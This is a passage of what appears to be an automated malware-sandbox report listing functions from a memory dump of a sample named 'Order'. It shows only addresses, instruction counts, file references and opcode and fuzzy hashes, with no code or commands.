                                                                Function 019BE388 Relevance: .1, Instructions: 86COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                • Instruction ID: 86c523bcb0ee30c9ea566d1b53928a6edc1824dce94939de59869f1b59ef91df
                                                                • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                • Instruction Fuzzy Hash: 56319A31600604EFD721CF68CA84FAAB7BAFF85754F1049A9E516CB681E730EE01CB50
                                                                Function 01A3E609 Relevance: .1, Instructions: 86COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0c1ef33aed611087c545702b93a042338e52f9c61f3b08e9d3f8b76a8571b1fc
                                                                • Instruction ID: cf23977f8096ea1332f31f0080f1d9864c232cb2b135dfd8f687a7d4ac5a0f89
                                                                • Opcode Fuzzy Hash: 0c1ef33aed611087c545702b93a042338e52f9c61f3b08e9d3f8b76a8571b1fc
                                                                • Instruction Fuzzy Hash: 19318D79A00245DFCB14CF18C984AAEBBB5FFC4304B194459F80A9B391E771EE50CB90
                                                                Function 01A406F1 Relevance: .1, Instructions: 79COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e094e418ee776bf7c1119e860e521db859a7fe3a9178f3eca9fcf99d8e2a763b
                                                                • Instruction ID: b250b2697fa2a88da4ffbdb4738c1aadadb7a51db4fe6667eed18bd6634bc944
                                                                • Opcode Fuzzy Hash: e094e418ee776bf7c1119e860e521db859a7fe3a9178f3eca9fcf99d8e2a763b
                                                                • Instruction Fuzzy Hash: 1221A0759005299BCF11DF59C981ABEB7F4FF88740F410069F941B7250D738AD42DBA1
                                                                Function 01A4019F Relevance: .1, Instructions: 78COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6c6dc2c2f68ba6edaf3a1e24a96d989280acb4dd27240d2aa54256bd7a882306
                                                                • Instruction ID: c9adf28f40ef8885506a8b520b5349353aca8bc7bc7a0237aad0d6d59326a9de
                                                                • Opcode Fuzzy Hash: 6c6dc2c2f68ba6edaf3a1e24a96d989280acb4dd27240d2aa54256bd7a882306
                                                                • Instruction Fuzzy Hash: 38219CB1A00645AFD715DB6DD980F6AB7B8FF88740F144069FA04D76A1D634ED40CBA8
                                                                Function 01A40283 Relevance: .1, Instructions: 74COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c4f06c391dda6dc44c856d5b35698f7cca255877a325b0f75fa96b077633692c
                                                                • Instruction ID: 85c34ff20ea99cf598ced6671f3590963db2b34d450d9784affd6adc41bf6b2a
                                                                • Opcode Fuzzy Hash: c4f06c391dda6dc44c856d5b35698f7cca255877a325b0f75fa96b077633692c
                                                                • Instruction Fuzzy Hash: F921B3B29043469BD711DF69CA48F9BBBECAFD0244F084456BE84C7251D734D904D6A2
                                                                Function 019E2835 Relevance: .1, Instructions: 73COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 829e09d296bc81a0be4774b8ddab5d0f5a5eefd9ff5d70d0b3426b9b356de36b
                                                                • Instruction ID: c2f4aa987fa4975c5f31ea5be523fe35bf218bd8fb7453ab298318595e5f8c83
                                                                • Opcode Fuzzy Hash: 829e09d296bc81a0be4774b8ddab5d0f5a5eefd9ff5d70d0b3426b9b356de36b
                                                                • Instruction Fuzzy Hash: 50212E317456919BF723976CCD08F247BD9EF41B75F1803A4FA249BAD2D768D801C642
                                                                Function 019FA30B Relevance: .1, Instructions: 70COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5f89dc4c7ffd067f3fc5f6af6219b93ff009195b7f40435d01ba46e297ea2888
                                                                • Instruction ID: 6bfdf8df46ac8ca7a62f581fe60af41f2a89d92211f626bc51711078800da9a2
                                                                • Opcode Fuzzy Hash: 5f89dc4c7ffd067f3fc5f6af6219b93ff009195b7f40435d01ba46e297ea2888
                                                                • Instruction Fuzzy Hash: 1C219879200A41AFC725DF29C840B46B7F5FF88B44F24846CA50DCBB62E371E942CB94
                                                                Function 01A7A49A Relevance: .1, Instructions: 70COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 24749e08d59facfbdda2f06fbeaac9db11ed17711d27db523f8e4b3b81a70f80
                                                                • Instruction ID: 36c7434a54964ea5edc1809cce117534c553c9fce94644d1875bc0884ef3b1e5
                                                                • Opcode Fuzzy Hash: 24749e08d59facfbdda2f06fbeaac9db11ed17711d27db523f8e4b3b81a70f80
                                                                • Instruction Fuzzy Hash: E0112972380B11BFE32256699C01F2F7A9DDBD4B60F194028B708CB290EB70DE018796
                                                                Function 01A40946 Relevance: .1, Instructions: 70COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b3fe0d9d4090e7751beefccced68051646b7fe35f5eede7ded0d9ac9c7eb3f78
                                                                • Instruction ID: 4e82054c36d63be822006a851918a24add10e6fc2478b51732db983f7094c6e2
                                                                • Opcode Fuzzy Hash: b3fe0d9d4090e7751beefccced68051646b7fe35f5eede7ded0d9ac9c7eb3f78
                                                                • Instruction Fuzzy Hash: B021E6B5E01249ABCB24DFAAD9849EEFBF8FF98700F10012EE509A7251D6709941CB64
                                                                Function 01A580A8 Relevance: .1, Instructions: 69COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                • Instruction ID: e23aeb8120d663496d6ba3a3b32a43ea7e1635725e3aa2eea45feae1ea329fb3
                                                                • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                • Instruction Fuzzy Hash: B6218C72A00209EFDF129F99CC40BAEBBB9FF98310F204419FD04A7251D738D9509B50
                                                                Function 019F0124 Relevance: .1, Instructions: 68COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                • Instruction ID: a6341cd7bfeb2ea56a7a4ba945cd338da804b30bc02fbaf3265eb15f85908177
                                                                • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                • Instruction Fuzzy Hash: 3A11EF72600609BFE7229F48CC80F9ABBBEEB81754F14802DF7088B190D671ED44CB60
                                                                Function 019C8770 Relevance: .1, Instructions: 68COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e8f3e295c547e9140981f07df067f8b09d48fa2fc1880512f782bfa8c1c5ea8a
                                                                • Instruction ID: 520363b57d3946c5182971ce3b24fa57e75f76bcdb1a4efc1f8d2d345f140774
                                                                • Opcode Fuzzy Hash: e8f3e295c547e9140981f07df067f8b09d48fa2fc1880512f782bfa8c1c5ea8a
                                                                • Instruction Fuzzy Hash: 1A11B2317006219FDB11CF4DC4C0A66BBEDAF8AF51B19406DEE4C9F205E6B2E9018792
                                                                Function 019FAAEE Relevance: .1, Instructions: 68COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                • Instruction ID: e1f27fc7263d5eaff1f8b5abffabeb850232b6861aed595a54df9a54d16677c7
                                                                • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                • Instruction Fuzzy Hash: 8921AC71640609EFD7259F49C540E26BBEAEF94B12F11883DEA4D87614C730ED00CB40
                                                                Function 019C80E9 Relevance: .1, Instructions: 66COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3459a2da3b20cee82a70a7e801a0a6edb70dea08737d4502d7c43d10eeeb77e9
                                                                • Instruction ID: 797e16ee788e14565faefcdcc35d4be0d1343f9e76303e758f99bee1a5761377
                                                                • Opcode Fuzzy Hash: 3459a2da3b20cee82a70a7e801a0a6edb70dea08737d4502d7c43d10eeeb77e9
                                                                • Instruction Fuzzy Hash: F021AE36A00206DFCB14CF98C590AAEBBF9FB88718F20456DD149AB311CB71AD06CBD1
                                                                Function 019F674D Relevance: .1, Instructions: 65COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 94056cf31e3ad85842e60cde1813cc553744bb205e373b612e597f9bb8a9ec07
                                                                • Instruction ID: cf4f3e373c0796cfa2f6bff6d48b20d71837f279296e360625c5c17cb1f85cc7
                                                                • Opcode Fuzzy Hash: 94056cf31e3ad85842e60cde1813cc553744bb205e373b612e597f9bb8a9ec07
                                                                • Instruction Fuzzy Hash: 21216A75610B01EFD7219F68C880F66B7E8FB84250F00882DE69EC7261DA30A850CBA0
                                                                Function 019EE8C0 Relevance: .1, Instructions: 63COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: aa17bfd495269ef95c3679d1975b64d73fe088acda949027e2f4454b27ee60d9
                                                                • Instruction ID: 545ede6f7d32d02a18a9aea43fed7db5ef695a499496b5adc671f9c46146b4b2
                                                                • Opcode Fuzzy Hash: aa17bfd495269ef95c3679d1975b64d73fe088acda949027e2f4454b27ee60d9
                                                                • Instruction Fuzzy Hash: 19112B733041149FCF1ADB29CC85A7B72ABEFD5374B358529D92ACB291E9309C12C390
                                                                Function 01A56870 Relevance: .1, Instructions: 63COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 41b509dad8b679ab422cd59233c9185a08f6f075f3a52736fe39bb2ee239bf6c
                                                                • Instruction ID: feb7c18f8f234ffb2744bc2a6ca8ed67a09bab6ecd0e07a1d7ef3800160b81e2
                                                                • Opcode Fuzzy Hash: 41b509dad8b679ab422cd59233c9185a08f6f075f3a52736fe39bb2ee239bf6c
                                                                • Instruction Fuzzy Hash: D211E072244605EFD763DBADC940F9A77B8EF99B60F414025FA09DB261DA70E901C7A0
                                                                Function 019F66B0 Relevance: .1, Instructions: 61COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f119002406f79cd0509e796dd8ca8ed24fdc3a1f54ddc00c314c8321aaffdf87
                                                                • Instruction ID: 849b6ddead7b1aefe800c5543c8fc125b505861dca6d641b6dae45101263b189
                                                                • Opcode Fuzzy Hash: f119002406f79cd0509e796dd8ca8ed24fdc3a1f54ddc00c314c8321aaffdf87
                                                                • Instruction Fuzzy Hash: 4D119E76A01345EFCB25CF59C580E5ABBF8AF94650B05817DDA0DAB311E630DD01CBA0
                                                                Function 01A8A8E4 Relevance: .1, Instructions: 61COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                • Instruction ID: 05f2eddd69df082f6491ac24d1db0593c84220e719cc2cab3f85c82eaf99a11b
                                                                • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                • Instruction Fuzzy Hash: 2111C436A00915AFDB19DB58CC05F9EFBF5EF84210F058269E855E7340E675AE51CB80
                                                                Function 019C0AD0 Relevance: .1, Instructions: 61COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                • Instruction ID: 590ea7e84d888740572503040febb8373df56fd8c161ce55045c39a6d95057de
                                                                • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                • Instruction Fuzzy Hash: 982106B5A00B059FD3A0CF29D540B52BBF4FB48B20F10892EE98AC7B50E371E814CB90
                                                                Function 01A4E7E1 Relevance: .1, Instructions: 59COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                • Instruction ID: 7f98ed3a86536edf2d5283f7e5e19675b0b3fd3f34940d967f3630593fe354d9
                                                                • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                • Instruction Fuzzy Hash: 9B11AC32600601EFFF229F59C844B5ABBA5FFC5794F05842CEA499B260DB39EC40DB90
                                                                Function 019E27ED Relevance: .1, Instructions: 58COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e49c5bab1912aaac70fc96ca0032728409e19e1b2905def114f20ac5a3109ea7
                                                                • Instruction ID: 8e0e1c9a321bb2ca3e108657ca8b53140242289718e8be66c7ff800f5f19109f
                                                                • Opcode Fuzzy Hash: e49c5bab1912aaac70fc96ca0032728409e19e1b2905def114f20ac5a3109ea7
                                                                • Instruction Fuzzy Hash: 1D012672305645ABE317A36EDC88F677BDCEF84354F094074F9098B641D914DC00C2A2
                                                                Function 019C4690 Relevance: .1, Instructions: 57COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 82c6677352080d002398601dc386093d1bed67d4b8b5ba2696577c4e2d630eda
                                                                • Instruction ID: e8785e8322f2b2eb5f322138a86b7e17792826aecbb3b0b4fab85f4e84532b67
                                                                • Opcode Fuzzy Hash: 82c6677352080d002398601dc386093d1bed67d4b8b5ba2696577c4e2d630eda
                                                                • Instruction Fuzzy Hash: 34119A36301645AFEB25CF59DA90F567BA8EB96A65F00452EF98C8B250C370E840CF61
                                                                Function 01A94B00 Relevance: .1, Instructions: 57COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4036801058f4e37257d3527339d42f181e2688bd7c213052a273811dd2683425
                                                                • Instruction ID: 0f3c272c351a8838dc5c858ce866298ac7142d43875c7a93ee72338e38687f25
                                                                • Opcode Fuzzy Hash: 4036801058f4e37257d3527339d42f181e2688bd7c213052a273811dd2683425
                                                                • Instruction Fuzzy Hash: D111C636200A119FDF229B6DD944F57B7E5FFC9711F194419E64687650DA30A843CB90
                                                                Function 019F6620 Relevance: .1, Instructions: 56COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 46af9e4d3144ffc63cfea2eb7fda4955185ae45a18d259495a392007f69de286
                                                                • Instruction ID: 723c9e096ddcbe47b9ae71cafc20a2000ab3201c8ebcdc8ac51f9cc955cb4139
                                                                • Opcode Fuzzy Hash: 46af9e4d3144ffc63cfea2eb7fda4955185ae45a18d259495a392007f69de286
                                                                • Instruction Fuzzy Hash: 0C118276A00715BBEB22EF69C9C0B5EFBBCEF84B51F510459DA09A7201D734AE018B50
                                                                Function 019EEA2E Relevance: .1, Instructions: 56COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 87bf20b19dc5952588a79e61599121ff11ef43f7467543a3941093f3197b01a6
                                                                • Instruction ID: 6fd5ae64e93933b0b099621cb84b1deb58b4e5c41b4c891d9df706ce25c516f6
                                                                • Opcode Fuzzy Hash: 87bf20b19dc5952588a79e61599121ff11ef43f7467543a3941093f3197b01a6
                                                                • Instruction Fuzzy Hash: 9C01D675900149AFC716DB19D448F26BBFAFBC1314F24826DE0098B272C770DC46CB94
                                                                Function 019EE53E Relevance: .1, Instructions: 55COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                • Instruction ID: adc9bb4baf8c8aa17e0648b7407e66fb94a7bc6aec172b74974ecfcf541126ca
                                                                • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                • Instruction Fuzzy Hash: D41104723026D69FEB23972CC958B253BF8FB40748F1904B0DE49CB682FB28C842C651
                                                                Function 01A4E75D Relevance: .1, Instructions: 54COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                • Instruction ID: e7008932f2dc8c49a05de19c95f1753ab4f650c9f14a1fdb60f9b531cfdc17de
                                                                • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                • Instruction Fuzzy Hash: 5001D236600106EFE721DF58C904F5ABAA9FBC0B64F058024EA499B260E779DD40C790
                                                                Function 019BA250 Relevance: .1, Instructions: 52COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                • Instruction ID: 89a1031a852c9a69a0b254949126899b055b2fbcafa06ed0542e93fbc7c3b325
                                                                • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                • Instruction Fuzzy Hash: F5014931404B219BDB318F19D980AB27BF8FF55761B00892DFC9D8B281D335D400CBA0
                                                                Function 01A94940 Relevance: .1, Instructions: 52COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5052e78efd87d295a85407e2109b5e55b3237cd21879ae93f0feba6e13d8b6b9
                                                                • Instruction ID: 7be06d6f5ee71077e4d436ed6b9f9cd6a900b26adf4dc8a4daf385f86f69c7e9
                                                                • Opcode Fuzzy Hash: 5052e78efd87d295a85407e2109b5e55b3237cd21879ae93f0feba6e13d8b6b9
                                                                • Instruction Fuzzy Hash: 2901D6725416019FCB36DF1CDA40E12B7E8EB99770B154255E968DB1A6D730D842C7D0
                                                                Function 01A3E1D0 Relevance: .1, Instructions: 51COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f6639b6e86dba718b6d63df08c5a5d74514a7d4293bb95cdf730ecd6f0845c03
                                                                • Instruction ID: bce4f9cbfed6fbcff3a59d7bed23a77ee307b3e0ef424328af59b62a55b6d538
                                                                • Opcode Fuzzy Hash: f6639b6e86dba718b6d63df08c5a5d74514a7d4293bb95cdf730ecd6f0845c03
                                                                • Instruction Fuzzy Hash: ED11C032241241EFDB16EF59CD80F56BBB8FF94B54F240069F9099B6A2C235ED01CAA0
                                                                Function 019C6259 Relevance: .1, Instructions: 51COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d4ff7d2d9e5d4f654babc3ee1f0ef995e230dbf4d9a9b5685aefd23e51151d9d
                                                                • Instruction ID: cb2617d6e6c43c8950d6486f124cde56d16679b19045642abc6d55468d75dd43
                                                                • Opcode Fuzzy Hash: d4ff7d2d9e5d4f654babc3ee1f0ef995e230dbf4d9a9b5685aefd23e51151d9d
                                                                • Instruction Fuzzy Hash: 7711AC70902228ABDB26EF24CD42FE9B3B8BF04710F5041D9A318E61E0DB309E81CF85
                                                                Function 019C208A Relevance: .0, Instructions: 50COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
